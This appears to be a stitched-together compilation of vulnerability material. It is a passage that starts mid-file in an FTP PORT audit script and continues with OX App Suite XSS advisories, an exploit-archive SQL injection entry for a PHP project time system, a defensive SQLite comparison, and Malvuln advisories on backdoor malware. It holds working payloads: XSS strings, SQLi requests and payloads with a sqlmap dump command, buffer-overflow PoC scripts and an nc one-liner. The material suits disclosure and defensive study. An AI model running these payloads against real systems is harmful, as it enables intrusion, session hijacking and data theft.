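LOG_RE = re.compile(r"peer=(?P<peer>\S+) cmd=PORT (?P<arg>\S+)")


def audit_log(text):
    """Run the PORT policy over log lines; return (line_number, reason) for
    every command a compliant server would have refused."""
    refused = []
    for no, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        allowed, reason = port_command_allowed(m["arg"], m["peer"])
        if not allowed:
            refused.append((no, reason))
    return refused


if __name__ == "__main__":
    for no, reason in audit_log(CONSTRUCTED_LOG):
        print(f"line {no}: {reason}")
```

The same rule should be mirrored on PASV: only accept the data connection from the control peer's address, otherwise the passive side can be abused in the opposite direction.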
<pre><code>Product: OX App Suite<br />Vendor: OX Software GmbH<br /><br /><br /><br />Internal reference: OXUIB-872<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.5 and earlier<br />Vulnerable component: frontend<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.3-rev30, 7.10.4-rev27, 7.10.5-rev18<br />Vendor notification: 2021-06-01<br />Solution date: 2021-08-23<br />Public disclosure: 2021-11-19<br />CVE reference: CVE-2021-38374<br />CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)<br /><br />Vulnerability Details:<br />The "app loader" mechanism of the frontend component could be abused to load content from relative URLs, outside of the intended code loading API path. This can be used by attackers to add references to malicious content that is served by the same domain.<br /><br />Risk:<br />Malicious script code can be executed within a user's context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require the victim to follow a hyperlink.<br /><br />Steps to reproduce:<br />1. As attacker, upload a code snippet to drive and create a sharing link<br />2. Modify the "app loader" URL and include a relative reference to the shared code snippet<br />3. 
Embed a direct reference to this snippet at a malicious website or make a user follow the reference<br /><br />Solution:<br />We now restrict relative references to only include the intended API path.<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: MWB-1113<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.5 and earlier<br />Vulnerable component: middleware<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.3-rev36, 7.10.4-rev27, 7.10.5-rev21<br />Vendor notification: 2021-06-02<br />Solution date: 2021-08-23<br />Public disclosure: 2021-11-19<br />CVE reference: CVE-2021-38375<br />CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)<br /><br />Vulnerability Details:<br />HTML E-Mails with lots of content are truncated for improved performance. Their full content is delivered when the HTML part is opened in a dedicated browser tab. The mechanism that dealt with inline images allowed script code to be injected as part of an HTML img "alt" attribute.<br /><br />Risk:<br />Malicious script code can be executed within a user's context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require the victim to open the non-truncated representation of an E-Mail.<br /><br />Steps to reproduce:<br />1. Create an artificially large HTML E-Mail with script code in an image's "alt" attribute.<br />2. 
Deliver the mail and make the victim display the truncated part<br /><br />Proof of concept:<br /><img alt="src=foo.bar/onerror=alert('XSS')//" src=""><br /><br />Solution:<br />We updated the detection and sanitization logic to deal with embedded script code fragments.<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: MWB-1116<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.5 and earlier<br />Vulnerable component: middleware<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.3-rev36, 7.10.4-rev27, 7.10.5-rev21<br />Vendor notification: 2021-06-02<br />Solution date: 2021-08-23<br />Public disclosure: 2021-11-19<br />CVE reference: CVE-2021-38377<br />CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)<br /><br />Vulnerability Details:<br />HTML E-Mails with lots of content are truncated for improved performance. Their full content is delivered when the HTML part is opened in a dedicated browser tab. The mechanism that dealt with temporary internal transformation state allowed script code to be injected by abusing an "anchor" HTML comment. The comment's identifier is a predictable UUID and stores HTML transformation results, which are exempt from sanitization.<br /><br />Risk:<br />Malicious script code can be executed within a user's context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require the victim to open the non-truncated representation of an E-Mail.<br /><br />Steps to reproduce:<br />1. Create an artificially large HTML E-Mail with script code in an "anchor" comment<br />2. 
Deliver the mail and make the victim display the truncated part<br /><br />Proof of concept:<br /><!--anchor-5fd15ca8-a027-4b14-93ea-35de1747419e: <img src="" onerror="alert('XSS');">--><br /><br />Solution:<br />We now use a random value for temporary anchors to avoid exploiting this internal state.<br /><br /><br />---<br /><br /><br /><br />Internal reference: MWB-1185<br />Vulnerability type: Information Disclosure (CWE-200)<br />Vulnerable version: 7.10.5 and earlier<br />Vulnerable component: middleware<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.3-rev36, 7.10.4-rev27, 7.10.5-rev21<br />Vendor notification: 2021-07-15<br />Solution date: 2021-08-23<br />Public disclosure: 2021-11-19<br />CVE reference: CVE-2021-38376<br />CVSS: 3.7 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N)<br /><br />Vulnerability Details:<br />The "rampup" API action allows a predefined set of information stored with a specific user session identifier to be extracted quickly, in order to load generic information such as available languages and folder names. It also contains a subset of personal information like a user's name and mail address. However, the call is not covered by standard authentication methods, allowing this information to be extracted when guessing or intercepting the user's session identifier.<br /><br />Risk:<br />Unauthorized parties may get access to confidential non-public information associated with a live user session. In order to gain access to the session identifier, an attacker requires access to infrastructure, log files or elevated privileges at either endpoint.<br /><br />Steps to reproduce:<br />1. Find out a user's session identifier<br />2. 
Use the "rampup" action of the login API call to request session information<br /><br />Proof of concept:<br />https://example.com/appsuite/api/login?action=rampup&rampup=true&rampUpFor=open-xchange-appsuite&session=76b5b1ae9352b9a0b6d483b6f2f78c70<br /><br />Solution:<br />We applied standard authentication requirements for this API action.<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: MWB-1208<br />Vulnerability type: Information Disclosure (CWE-200)<br />Vulnerable version: 7.10.5<br />Vulnerable component: middleware<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.3-rev36, 7.10.4-rev27, 7.10.5-rev21<br />Vendor notification: 2021-08-09<br />Solution date: 2021-08-23<br />Public disclosure: 2021-11-19<br />CVE reference: CVE-2021-38378<br />CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)<br /><br />Vulnerability Details:<br />A caching mechanism for files in OX Drive did not consider the context identifier of a specific object.<br /><br />Risk:<br />Unauthorized users may get access to confidential information, like other users' names, by observing the "modified by" response of the API for files that collide with other users' files bearing the same identifier. This weakness depends on chance and is limited to the names of users; there is no evidence that actual file content could have been exposed.<br /><br />Steps to reproduce:<br />1. Create multiple files in OX Drive on an environment with many contexts<br />2. Observe the "modified by" information which indicates who last changed the file<br />3. In rare cases where identifiers collided, other users' surnames and given names were shown<br /><br />Solution:<br />We made the affected cache context-aware to avoid exposing this sort of information to unauthorized users.<br /><br /></code></pre>
<pre><code># Exploit Title: Online Project Time Management System 1.0 - SQLi (Authenticated)<br /># Date: 19/01/2022<br /># Exploit Author: Felipe Alcantara (Filiplain)<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: Kali Linux<br /><br /># Steps to reproduce<br /># Log in as an employee<br /># Go to: http://localhost/ptms/?page=user<br /># Click Update<br /># Save the request in Burp Suite<br /># Run the saved request with sqlmap: sqlmap -r request.txt --batch --risk 3 --level 3 --dump<br /><br />==========================<br />POST /ptms/classes/Users.php?f=save_employee HTTP/1.1<br />Host: localhost<br />Content-Length: 1362<br />Accept: application/json, text/javascript, */*; q=0.01<br />X-Requested-With: XMLHttpRequest<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundary39q8yel1pdwYRLNz<br />Origin: http://localhost<br />Referer: http://localhost/ptms/?page=user<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm<br />Connection: close<br /><br /><br />------WebKitFormBoundary39q8yel1pdwYRLNz<br />Content-Disposition: form-data; name="id"<br /><br />4' AND (SELECT 1 FROM (SELECT(SLEEP(4)))test)-- test<br />------WebKitFormBoundary39q8yel1pdwYRLNz<br />Content-Disposition: form-data; name="code"<br /><br />2022-0003<br />------WebKitFormBoundary39q8yel1pdwYRLNz<br />Content-Disposition: form-data; name="generated_password"<br /><br /><br />------WebKitFormBoundary39q8yel1pdwYRLNz<br />Content-Disposition: form-data; name="firstname"<br /><br />Mark 2223<br />------WebKitFormBoundary39q8yel1pdwYRLNz<br />Content-Disposition: form-data; name="middlename"<br /><br />Z<br />------WebKitFormBoundary39q8yel1pdwYRLNz<br />Content-Disposition: form-data; name="lastname"<br /><br />Cooper<br />------WebKitFormBoundary39q8yel1pdwYRLNz<br />Content-Disposition: form-data; name="gender"<br /><br />Male<br />------WebKitFormBoundary39q8yel1pdwYRLNz<br />Content-Disposition: form-data; name="department"<br /><br />IT Department<br />------WebKitFormBoundary39q8yel1pdwYRLNz<br />Content-Disposition: form-data; name="position"<br /><br />Department Manager<br />------WebKitFormBoundary39q8yel1pdwYRLNz<br />Content-Disposition: form-data; name="email"<br /><br />mcooper@sample.com<br />------WebKitFormBoundary39q8yel1pdwYRLNz<br />Content-Disposition: form-data; name="password"<br /><br /><br />------WebKitFormBoundary39q8yel1pdwYRLNz<br />Content-Disposition: form-data; name="img"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundary39q8yel1pdwYRLNz--<br /><br /><br /><br /><br />==========================<br /><br />#Payloads<br />#++++++++++++<br />#Payload: (boolean-based blind)<br /><br />#------WebKitFormBoundary39q8yel1pdwYRLNz<br />#Content-Disposition: form-data; name="id"<br /><br />#4' or 1=1 --<br /><br />#--------<br /><br />#Payload: (time-based blind)<br /><br />#------WebKitFormBoundary39q8yel1pdwYRLNz<br />#Content-Disposition: form-data; name="id"<br /><br />#4' AND (SELECT 1 FROM (SELECT(SLEEP(4)))test)-- test<br /><br />#-------<br /></code></pre>
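An added example, not code from the affected project: the injectable `id` field of the save_employee request rebuilt against an in-memory SQLite table, with a string-built UPDATE beside a parameterized one, to show what the advisory's boolean-based payload does to each. The table, its rows and the assumed shape of the UPDATE are constructed; the page shows only the request.

```python
import sqlite3
from typing import List, Tuple

# Constructed sample rows mirroring the form fields of the save_employee request.
SAMPLE_ROWS = [
    (1, "2022-0001", "Ann", "Lee"),
    (2, "2022-0002", "Joe", "Ray"),
    (4, "2022-0003", "Mark", "Cooper"),
]


def fresh_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, code TEXT, firstname TEXT, lastname TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return con


def save_employee_vulnerable(con: sqlite3.Connection, user_id: str, firstname: str) -> int:
    """String-built query (assumed shape; the page shows only the request, not the code).
    Returns the number of rows the UPDATE touched."""
    sql = f"UPDATE users SET firstname = '{firstname}' WHERE id = '{user_id}'"
    cur = con.execute(sql)
    con.commit()
    return cur.rowcount


def save_employee_fixed(con: sqlite3.Connection, user_id: str, firstname: str) -> int:
    """Hardened form: the id is validated as an integer and bound as a parameter,
    so the quote and comment sequence in the payload are never parsed as SQL."""
    if not user_id.isdecimal():
        raise ValueError("id must be a non-negative integer")
    cur = con.execute("UPDATE users SET firstname = ? WHERE id = ?", (firstname, int(user_id)))
    con.commit()
    return cur.rowcount


def firstnames(con: sqlite3.Connection) -> List[Tuple[int, str]]:
    return list(con.execute("SELECT id, firstname FROM users ORDER BY id"))


# The boolean-based payload quoted in the advisory above.
PAYLOAD = "4' or 1=1 --"


def compare() -> Tuple[int, int]:
    """Returns (rows changed by the vulnerable path, rows changed by the fixed path)."""
    vulnerable = save_employee_vulnerable(fresh_db(), PAYLOAD, "Mark 2223")
    try:
        fixed = save_employee_fixed(fresh_db(), PAYLOAD, "Mark 2223")
    except ValueError:
        fixed = 0  # request rejected before any query runs
    return vulnerable, fixed


if __name__ == "__main__":
    print(compare())  # (3, 0): the injected condition matched every employee row
```

The time-based payload in the advisory relies on MySQL's SLEEP() and has no SQLite equivalent, which is why the boolean-based one is used here; the parameterized path rejects both identically.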
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/694d21679cc212c59515584d1b65dc84.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.BlueAdept.02.a<br />Vulnerability: Remote Buffer Overflow<br />Description: The malware listens on TCP port 6969, after connecting to the infected host TCP ports 6970, 6971 are then opened. The newly opened port 6970 is vulnerable allowing third party attackers who can reach an infected host ability to trigger a buffer overflow overwriting EAX, ECX and EDX registers.<br />Type: PE32<br />MD5: 694d21679cc212c59515584d1b65dc84<br />Vuln ID: MVID-2021-0408<br />Dropped files: <br />ASLR: False<br />DEP: False<br />Safe SEH: True<br />Disclosure: 11/21/2021<br /><br />Memory Dump:<br />(1a34.157c): Access violation - code c0000005 (first/second chance not available)<br />eax=41414141 ebx=04213858 ecx=41414141 edx=41414141 esi=00000014 edi=0045e610<br />eip=00401c62 esp=000a141c ebp=0045e614 iopl=0 nv up ei pl nz na pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206<br />*** WARNING: Unable to verify checksum for Backdoor.Win32.BlueAdept.02.a.694d21679cc212c59515584d1b65dc84.exe<br />*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.BlueAdept.02.a.694d21679cc212c59515584d1b65dc84.exe<br />Backdoor_Win32_BlueAdept_02_a_694d21679cc212c59515584d1b65dc84+0x1c62:<br />00401c62 8902 mov dword ptr [edx],eax ds:002b:41414141=????????<br /><br />0:000> .ecxr<br />eax=41414141 ebx=04213858 ecx=41414141 edx=41414141 esi=00000014 edi=0045e610<br />eip=00401c62 esp=000a141c ebp=0045e614 iopl=0 nv up ei pl nz na pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206<br />Backdoor_Win32_BlueAdept_02_a_694d21679cc212c59515584d1b65dc84+0x1c62:<br />00401c62 8902 mov dword ptr [edx],eax ds:002b:41414141=????????<br /><br />0:000> !analyze -v<br 
/>*******************************************************************************<br />* *<br />* Exception Analysis *<br />* *<br />*******************************************************************************<br /><br /><br />FAULTING_IP: <br />Backdoor_Win32_BlueAdept_02_a_694d21679cc212c59515584d1b65dc84+1c62<br />00401c62 8902 mov dword ptr [edx],eax<br /><br />EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)<br />ExceptionAddress: 00401c62 (Backdoor_Win32_BlueAdept_02_a_694d21679cc212c59515584d1b65dc84+0x00001c62)<br /> ExceptionCode: c0000005 (Access violation)<br /> ExceptionFlags: 00000000<br />NumberParameters: 2<br /> Parameter[0]: 00000001<br /> Parameter[1]: 41414141<br />Attempt to write to address 41414141<br /><br />PROCESS_NAME: Backdoor.Win32.BlueAdept.02.a.694d21679cc212c59515584d1b65dc84.exe<br /><br />ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. 
The memory could not be %s.<br /><br />EXCEPTION_PARAMETER1: 00000001<br /><br />EXCEPTION_PARAMETER2: 41414141<br /><br />WRITE_ADDRESS: 41414141 <br /><br />FOLLOWUP_IP: <br />Backdoor_Win32_BlueAdept_02_a_694d21679cc212c59515584d1b65dc84+1c62<br />00401c62 8902 mov dword ptr [edx],eax<br /><br />MOD_LIST: <ANALYSIS/><br /><br />NTGLOBALFLAG: 0<br /><br />APPLICATION_VERIFIER_FLAGS: 0<br /><br />FAULTING_THREAD: 0000157c<br /><br />BUGCHECK_STR: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_WRITE_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />PRIMARY_PROBLEM_CLASS: STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />DEFAULT_BUCKET_ID: STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />IP_ON_HEAP: 0423fffc<br />The fault address in not in any loaded module, please check your build's rebase<br />log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may<br />contain the address if it were loaded.<br /><br />FRAME_ONE_INVALID: 1<br /><br />LAST_CONTROL_TRANSFER: from 0423fffc to 00401c62<br /><br />STACK_TEXT: <br />WARNING: Stack unwind information not available. 
Following frames may be wrong.<br />0045e614 0423fffc 02563ae8 02561754 02561774 Backdoor_Win32_BlueAdept_02_a_694d21679cc212c59515584d1b65dc84+0x1c62<br />00000000 00000000 00000000 00000000 00000000 0x423fffc<br /><br /><br />SYMBOL_STACK_INDEX: 0<br /><br />SYMBOL_NAME: Backdoor_Win32_BlueAdept_02_a_694d21679cc212c59515584d1b65dc84+1c62<br /><br />FOLLOWUP_NAME: MachineOwner<br /><br />MODULE_NAME: Backdoor_Win32_BlueAdept_02_a_694d21679cc212c59515584d1b65dc84<br /><br />IMAGE_NAME: Backdoor.Win32.BlueAdept.02.a.694d21679cc212c59515584d1b65dc84.exe<br /><br />DEBUG_FLR_IMAGE_TIMESTAMP: 2a425e19<br /><br />STACK_COMMAND: dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ~0s; .ecxr ; kb<br /><br />FAILURE_BUCKET_ID: STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.BlueAdept.02.a.694d21679cc212c59515584d1b65dc84.exe!Unknown<br /><br />BUCKET_ID: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_WRITE_EXPLOITABLE_FILL_PATTERN_41414141_Backdoor_Win32_BlueAdept_02_a_694d21679cc212c59515584d1b65dc84+1c62<br /><br /><br />Exploit/PoC:<br />from socket import *<br />import time<br /><br />MALWARE_HOST="x.x.x.x"<br />PORT=6969<br />PORT2=6970 #vuln port<br /><br />def doit():<br /><br /> s=socket(AF_INET, SOCK_STREAM)<br /> s.connect((MALWARE_HOST, PORT))<br /> time.sleep(1)<br /> print("[+] Opened vulnerable port!")<br /> s.close()<br /> <br /> PAYLOAD="TRACE /"+"A"*17558+ " HTTP/1.1\r\n\r\n"<br /><br /> s2=socket(AF_INET, SOCK_STREAM)<br /> s2.connect((MALWARE_HOST, PORT2))<br /><br /> print("[+] Sending malicious packets!")<br /> <br /> for i in range(0, 10):<br /> s2.send(PAYLOAD)<br /> time.sleep(0.2)<br /> <br /> s2.close()<br /><br /><br />if __name__=="__main__":<br /> doit()<br /> print("Malvuln")<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. 
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/fc100ff65f676a26293915407adc211c.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.FTP.Lana.01.d<br />Vulnerability: Weak Hardcoded Password<br />Description: The malware listens on TCP port 6666. The credentials "user" and "pass" are weak and stored in plaintext with the executable.<br />Type: PE32<br />MD5: fc100ff65f676a26293915407adc211c<br />Vuln ID: MVID-2022-0468<br />Dropped files: FTP.exe<br />Disclosure: 01/24/2022<br /><br />Exploit/PoC:<br />.text:00402C08 push offset aUser ; "user"<br />.text:00402C0D push eax ; lpString1<br />.text:00402C0E call lstrcmpiA<br />.text:00402C13 or eax, eax<br /><br /><br />.text:00402C71 jz short loc_402CB0<br />.text:00402C73 mov eax, [ebp+lpString1]<br />.text:00402C76 add eax, 5<br />.text:00402C79 push offset aPass ; "pass"<br /><br /><br />telnet.exe x.x.x.x 6666<br />220 Anal FTP v0.1 <br />USER user <br />331 Password required for user. <br />PASS pass <br />230 User logged in, proceed. <br />SYST <br />215 UNIX Type: L8 <br />PASV <br />227 Entering Passive Mode (192,168,18,129,225,245). <br />STOR DOOM.exe <br />150 Data connection accepted. <br />226 Transfer ok <br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. 
The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/a8818da39c7d36d9b5497d1a875798b8.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.BNLite<br />Vulnerability: Remote Heap Based Buffer Overflow<br />Description: The malware listens on TCP port 5000. Third party attackers who can reach the system can send a specially crafted payload to trigger a heap based buffer overflow overwriting the ECX, EDX registers and corrupting memory located on the heap.<br />Type: PE32<br />MD5: a8818da39c7d36d9b5497d1a875798b8<br />Vuln ID: MVID-2021-0407<br />Dropped files: procmon.exe<br />ASLR: False<br />DEP: False<br />Safe SEH: True<br />Disclosure: 11/21/2021<br /><br />Memory Dump:<br />(1578.f54): Access violation - code c0000005 (first/second chance not available)<br />eax=00000000 ebx=00000000 ecx=41414141 edx=41414141 esi=00000003 edi=00000003<br />eip=7770ed3c esp=0019f3b4 ebp=0019f544 iopl=0 nv up ei pl nz na pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206<br />ntdll!ZwWaitForMultipleObjects+0xc:<br />7770ed3c c21400 ret 14h<br /><br />0:000> .ecxr<br />eax=00004141 ebx=02477958 ecx=41414141 edx=41414141 esi=02477960 edi=02430000<br />eip=776e2d6a esp=0019fcf0 ebp=0019feb0 iopl=0 nv up ei pl nz ac po nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010212<br />ntdll!RtlpAllocateHeap+0x37a:<br />776e2d6a 8b09 mov ecx,dword ptr [ecx] ds:002b:41414141=????????<br /><br />0:000> !analyze -v<br />*******************************************************************************<br />* *<br />* Exception Analysis *<br />* *<br />*******************************************************************************<br /><br />*** WARNING: Unable to verify checksum for procmon.exe<br />*** ERROR: Module load completed but symbols could not be loaded for procmon.exe<br />Failed calling InternetOpenUrl, GLE=12029<br /><br />FAULTING_IP: <br 
/>ntdll!RtlpAllocateHeap+37a<br />776e2d6a 8b09 mov ecx,dword ptr [ecx]<br /><br />EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)<br />ExceptionAddress: 776e2d6a (ntdll!RtlpAllocateHeap+0x0000037a)<br /> ExceptionCode: c0000005 (Access violation)<br /> ExceptionFlags: 00000000<br />NumberParameters: 2<br /> Parameter[0]: 00000000<br /> Parameter[1]: 41414141<br />Attempt to read from address 41414141<br /><br />PROCESS_NAME: procmon.exe<br /><br />ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_PARAMETER1: 00000000<br /><br />EXCEPTION_PARAMETER2: 41414141<br /><br />READ_ADDRESS: 41414141 <br /><br />FOLLOWUP_IP: <br />procmon+1966<br />00401966 a3c6304000 mov dword ptr [procmon+0x30c6 (004030c6)],eax<br /><br />MOD_LIST: <ANALYSIS/><br /><br />NTGLOBALFLAG: 0<br /><br />APPLICATION_VERIFIER_FLAGS: 0<br /><br />FAULTING_THREAD: 00000f54<br /><br />BUGCHECK_STR: APPLICATION_FAULT_ACTIONABLE_HEAP_CORRUPTION_heap_failure_buffer_overrun_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141<br /><br />PRIMARY_PROBLEM_CLASS: ACTIONABLE_HEAP_CORRUPTION_heap_failure_buffer_overrun_FILL_PATTERN_41414141<br /><br />DEFAULT_BUCKET_ID: ACTIONABLE_HEAP_CORRUPTION_heap_failure_buffer_overrun_FILL_PATTERN_41414141<br /><br />LAST_CONTROL_TRANSFER: from 776e16b7 to 776e2d6a<br /><br />STACK_TEXT: <br />0019feb0 776e16b7 00000449 00000458 02439328 ntdll!RtlpAllocateHeap+0x37a<br />0019ff00 776e13ee 00100008 00000000 00000000 ntdll!RtlpAllocateHeapInternal+0x2b7<br />0019ff18 74a10cd4 02430000 00100008 00000449 ntdll!RtlAllocateHeap+0x3e<br />0019ff68 00401966 00000040 00000449 0019ff94 KERNELBASE!GlobalAlloc+0x64<br />WARNING: Stack unwind information not available. 
Following frames may be wrong.<br />0019ff78 0040125b 0000037c 77408654 00326000 procmon+0x1966<br />0019ff94 77704a77 00326000 1cd497cc 00000000 procmon+0x125b<br />0019ffdc 77704a47 ffffffff 77729eb4 00000000 ntdll!__RtlUserThreadStart+0x2f<br />0019ffec 00000000 00401000 00326000 00000000 ntdll!_RtlUserThreadStart+0x1b<br /><br /><br />STACK_COMMAND: !heap ; ~0s; .ecxr ; kb<br /><br />SYMBOL_STACK_INDEX: 4<br /><br />SYMBOL_NAME: procmon+1966<br /><br />FOLLOWUP_NAME: MachineOwner<br /><br />MODULE_NAME: procmon<br /><br />IMAGE_NAME: procmon.exe<br /><br />DEBUG_FLR_IMAGE_TIMESTAMP: 3aa07951<br /><br />FAILURE_BUCKET_ID: ACTIONABLE_HEAP_CORRUPTION_heap_failure_buffer_overrun_FILL_PATTERN_41414141_c0000005_procmon.exe!Unknown<br /><br />BUCKET_ID: APPLICATION_FAULT_ACTIONABLE_HEAP_CORRUPTION_heap_failure_buffer_overrun_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141_procmon+1966<br /><br /><br />Exploit/PoC:<br />python -c "print('GET /'+'A'*10000+' HTTP/1.1\r\n\r\n')" | nc64.exe x.x.x.x 5000<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. 
All content Copyright (c) Malvuln.com (TM).<br /></code></pre>